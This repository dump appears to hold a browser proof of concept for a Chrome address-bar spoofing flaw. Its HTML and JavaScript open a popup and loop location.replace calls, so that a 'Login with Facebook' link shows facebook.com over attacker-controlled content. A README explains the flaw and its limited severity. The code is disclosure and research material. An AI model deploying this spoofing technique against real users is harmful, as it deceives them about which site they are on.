├── screenshot.png
├── content.html
├── index.html
└── README.md


/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/musalbas/address-spoofing-poc/HEAD/screenshot.png


--------------------------------------------------------------------------------
/content.html:
--------------------------------------------------------------------------------
1 | <html>
2 | 	<body>
3 | 		This is not facebook.com! This is EVIL!
4 | 		<script>
5 | 			window.location.href = 'https://facebook.com';
6 | 		</script>
7 | 	</body>
8 | </html>
9 | 


--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 	<head>
 3 | 		<script>
 4 | 			function next() {
 5 | 				w.location.replace('https://facebook.com/?'+n);
 6 | 				n++;
 7 | 
 8 | 				setTimeout("next();",15);
 9 | 				setTimeout("next();",25);
10 | 			}
11 | 
12 | 			function f() {
13 | 				w = window.open("content.html", "_blank", "width=500 height=500");
14 | 				i = setInterval("try { x = w.location.href; } catch(e) { clearInterval(i); n = 0; next(); }", 5);
15 | 			}
16 | 		</script>
17 | 	</head>
18 | 
19 | 	<body>
20 | 		<a href="#" onclick="f()">Login with Facebook</a>
21 | 	</body>
22 | </html>
23 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | This is a modification of a proof-of-concept of a chrome address spoofing flaw published by David Leo (david.leo () deusen co uk) on the [Full Disclosure mailing list](http://seclists.org/fulldisclosure/2015/Jun/108).
 2 | 
 3 | (According to the [original publication](http://seclists.org/fulldisclosure/2015/Jun/108), this was reported to Google but it was regarded as a non-vulnerability.)
 4 | 
 5 | This version spoofs the HTTPS version of facebook.com. Surprisingly, it even shows the certificate in green:
 6 | 
 7 | ![](https://raw.githubusercontent.com/musalbas/address-spoofing-poc/master/screenshot.png)
 8 | 
 9 | You can try a [live demo](http://musalbas.github.io/address-spoofing-poc/) but note that you may have to try it a few times for it to work. There's a connection timing condition involved. However if you clone the repo locally, it should work 100% of the time.
10 | 
11 | Note that you can't interact with the spoofed web page, making the severity of this vulnerability limited as it can't be used to do direct phishing.
12 | 


--------------------------------------------------------------------------------